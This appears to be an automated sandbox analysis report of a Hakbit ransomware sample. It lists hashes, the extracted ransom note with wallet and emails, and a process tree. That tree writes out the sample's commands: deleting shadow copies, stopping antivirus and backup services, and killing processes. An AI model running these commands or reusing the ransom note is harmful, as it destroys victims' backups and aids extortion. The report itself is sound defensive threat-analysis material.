Analysis
-
max time kernel
274s -
max time network
277s -
platform
windows10_x64 -
resource
win10 -
submitted
09-07-2020 21:28
Static task
static1
Behavioral task
behavioral1
Sample
AVTK_Win_Sybari.exe
Resource
win10
General
-
Target
AVTK_Win_Sybari.exe
-
Size
62KB
-
MD5
d5edd6b32296d1cee4829fb1499c8759
-
SHA1
b7f33bd8aeb6cdd59cbf88802938c6efc0108829
-
SHA256
b99e0b750b3815fec3b292ede3f94524c8bede7d158334295e096518e9cde0ad
-
SHA512
8f320e8461691572dbe21f7ae4d96f067e4d2fb228de8c9b3be5325d43905d637438fd5aaed14e603ef73bb79b47d20e650dfb4b27dad74140a703a629884bf5
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
Family
hakbit
Ransom Note
Atention! all your important files were encrypted!
to get your files back send 1 Bitcoins and contact us with proof of payment and your Unique Identifier Key.
We will send you a decryption tool with your personal decryption password.
Where can you buy Bitcoins:
https://www.coinbase.com
https://localbitcoins.com
Contact: torsec1@secmail.pro
agarrard@protonmail.com
Bitcoin wallet to make the transfer to is:
1F9i1vpfGfKXaUqhhgTmxe9Y2aS8stSGvR1F9i1vpfGfKXaUqhhgTmxe9Y2aS8stSGvR
Unique Identifier Key (must be sent to us together with proof of payment):
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
n4oC8V5pUjJ61XDU0XZo7S+2HV88Z+URAxPv7zEZsXchYOENWei2gK1g2Uk8m+0YKXrrQZ+6QjlXhMa/uEoAj8YK4T7nwDQaLZOG5vZr/btKFeZCKgZupLrISRA87jYL2gNt0fqe0Db0w5LYP5mSs+v6w7DslwJw5BtAeCVHbpz2ZL9v1jy+dD2asYjCwNsnfCqSa0H2h+IV8cBbZcgqUq08Cu2hZpv7VA7bjcT08pS2XesLojQ/X06v5ktwYgKapc/0eaAxEbbkUk80+4cbt/1qbqCSPGfJkDJ6Su55EoOVZc7I27c7l4Bx9tJGgsqBvuAurFWtTvsey8D+N+dg2A==
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Emails
torsec1@secmail.pro
agarrard@protonmail.com
Signatures
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1668 notepad.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Suspicious behavior: EnumeratesProcesses 2439 IoCs
Processes:
AVTK_Win_Sybari.exepid process 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe 3904 AVTK_Win_Sybari.exe -
Runs net.exe
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
AVTK_Win_Sybari.exetaskkill.exetaskkill.exetaskkill.exevssvc.exedescription pid process Token: SeDebugPrivilege 3904 AVTK_Win_Sybari.exe Token: SeDebugPrivilege 3832 taskkill.exe Token: SeDebugPrivilege 1852 taskkill.exe Token: SeDebugPrivilege 344 taskkill.exe Token: SeBackupPrivilege 2316 vssvc.exe Token: SeRestorePrivilege 2316 vssvc.exe Token: SeAuditPrivilege 2316 vssvc.exe -
Suspicious use of WriteProcessMemory 70 IoCs
Processes:
AVTK_Win_Sybari.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3904 wrote to memory of 3876 3904 AVTK_Win_Sybari.exe net.exe PID 3904 wrote to memory of 3876 3904 AVTK_Win_Sybari.exe net.exe PID 3876 wrote to memory of 3828 3876 net.exe net1.exe PID 3876 wrote to memory of 3828 3876 net.exe net1.exe PID 3904 wrote to memory of 2564 3904 AVTK_Win_Sybari.exe net.exe PID 3904 wrote to memory of 2564 3904 AVTK_Win_Sybari.exe net.exe PID 2564 wrote to memory of 2612 2564 net.exe net1.exe PID 2564 wrote to memory of 2612 2564 net.exe net1.exe PID 3904 wrote to memory of 3284 3904 AVTK_Win_Sybari.exe net.exe PID 3904 wrote to memory of 3284 3904 AVTK_Win_Sybari.exe net.exe PID 3284 wrote to memory of 3352 3284 net.exe net1.exe PID 3284 wrote to memory of 3352 3284 net.exe net1.exe PID 3904 wrote to memory of 3428 3904 AVTK_Win_Sybari.exe net.exe PID 3904 wrote to memory of 3428 3904 AVTK_Win_Sybari.exe net.exe PID 3428 wrote to memory of 1708 3428 net.exe net1.exe PID 3428 wrote to memory of 1708 3428 net.exe net1.exe PID 3904 wrote to memory of 1552 3904 AVTK_Win_Sybari.exe net.exe PID 3904 wrote to memory of 1552 3904 AVTK_Win_Sybari.exe net.exe PID 1552 wrote to memory of 364 1552 net.exe net1.exe PID 1552 wrote to memory of 364 1552 net.exe net1.exe PID 3904 wrote to memory of 1956 3904 AVTK_Win_Sybari.exe sc.exe PID 3904 wrote to memory of 1956 3904 AVTK_Win_Sybari.exe sc.exe PID 3904 wrote to memory of 2904 3904 AVTK_Win_Sybari.exe sc.exe PID 3904 wrote to memory of 2904 3904 AVTK_Win_Sybari.exe sc.exe PID 3904 wrote to memory of 796 3904 AVTK_Win_Sybari.exe sc.exe PID 3904 wrote to memory of 796 3904 AVTK_Win_Sybari.exe sc.exe PID 3904 wrote to memory of 752 3904 AVTK_Win_Sybari.exe sc.exe PID 3904 wrote to memory of 752 3904 AVTK_Win_Sybari.exe sc.exe PID 3904 wrote to memory of 3832 3904 AVTK_Win_Sybari.exe taskkill.exe PID 3904 wrote to memory of 3832 3904 AVTK_Win_Sybari.exe taskkill.exe PID 3904 wrote to memory of 1852 3904 AVTK_Win_Sybari.exe taskkill.exe PID 3904 wrote to memory of 1852 3904 AVTK_Win_Sybari.exe taskkill.exe PID 3904 wrote to memory of 344 3904 AVTK_Win_Sybari.exe taskkill.exe PID 3904 wrote to memory of 344 3904 AVTK_Win_Sybari.exe taskkill.exe PID 3904 wrote to memory of 3688 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3688 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 748 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 748 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3756 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3756 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3456 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3456 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3724 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3724 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 508 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 508 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 256 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 256 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 1752 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 1752 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3896 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3896 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 4004 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 4004 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3448 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3448 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 540 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 540 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3948 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3948 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 252 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 252 3904 AVTK_Win_Sybari.exe vssadmin.exe PID 3904 wrote to memory of 3784 3904 AVTK_Win_Sybari.exe arp.exe PID 3904 wrote to memory of 3784 3904 AVTK_Win_Sybari.exe arp.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3832 taskkill.exe 1852 taskkill.exe 344 taskkill.exe -
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 3896 vssadmin.exe 3448 vssadmin.exe 256 vssadmin.exe 3948 vssadmin.exe 3688 vssadmin.exe 3456 vssadmin.exe 3724 vssadmin.exe 1752 vssadmin.exe 4004 vssadmin.exe 748 vssadmin.exe 3756 vssadmin.exe 508 vssadmin.exe 540 vssadmin.exe 252 vssadmin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\AVTK_Win_Sybari.exe"C:\Users\Admin\AppData\Local\Temp\AVTK_Win_Sybari.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\arp.exe"arp" -a
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\AVTK_Win_Sybari.exe
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 3
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
00:00
00:00
Downloads
-
C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
-
memory/252-30-0x0000000000000000-mapping.dmp
-
memory/256-23-0x0000000000000000-mapping.dmp
-
memory/344-16-0x0000000000000000-mapping.dmp
-
memory/364-9-0x0000000000000000-mapping.dmp
-
memory/508-22-0x0000000000000000-mapping.dmp
-
memory/540-28-0x0000000000000000-mapping.dmp
-
memory/748-18-0x0000000000000000-mapping.dmp
-
memory/752-13-0x0000000000000000-mapping.dmp
-
memory/796-12-0x0000000000000000-mapping.dmp
-
memory/1552-8-0x0000000000000000-mapping.dmp
-
memory/1668-32-0x0000000000000000-mapping.dmp
-
memory/1708-7-0x0000000000000000-mapping.dmp
-
memory/1752-24-0x0000000000000000-mapping.dmp
-
memory/1824-33-0x0000000000000000-mapping.dmp
-
memory/1852-15-0x0000000000000000-mapping.dmp
-
memory/1956-10-0x0000000000000000-mapping.dmp
-
memory/2204-34-0x0000000000000000-mapping.dmp
-
memory/2564-2-0x0000000000000000-mapping.dmp
-
memory/2612-3-0x0000000000000000-mapping.dmp
-
memory/2904-11-0x0000000000000000-mapping.dmp
-
memory/3284-4-0x0000000000000000-mapping.dmp
-
memory/3352-5-0x0000000000000000-mapping.dmp
-
memory/3428-6-0x0000000000000000-mapping.dmp
-
memory/3448-27-0x0000000000000000-mapping.dmp
-
memory/3456-20-0x0000000000000000-mapping.dmp
-
memory/3688-17-0x0000000000000000-mapping.dmp
-
memory/3724-21-0x0000000000000000-mapping.dmp
-
memory/3756-19-0x0000000000000000-mapping.dmp
-
memory/3784-31-0x0000000000000000-mapping.dmp
-
memory/3828-1-0x0000000000000000-mapping.dmp
-
memory/3832-14-0x0000000000000000-mapping.dmp
-
memory/3876-0-0x0000000000000000-mapping.dmp
-
memory/3896-25-0x0000000000000000-mapping.dmp
-
memory/3948-29-0x0000000000000000-mapping.dmp
-
memory/4004-26-0x0000000000000000-mapping.dmp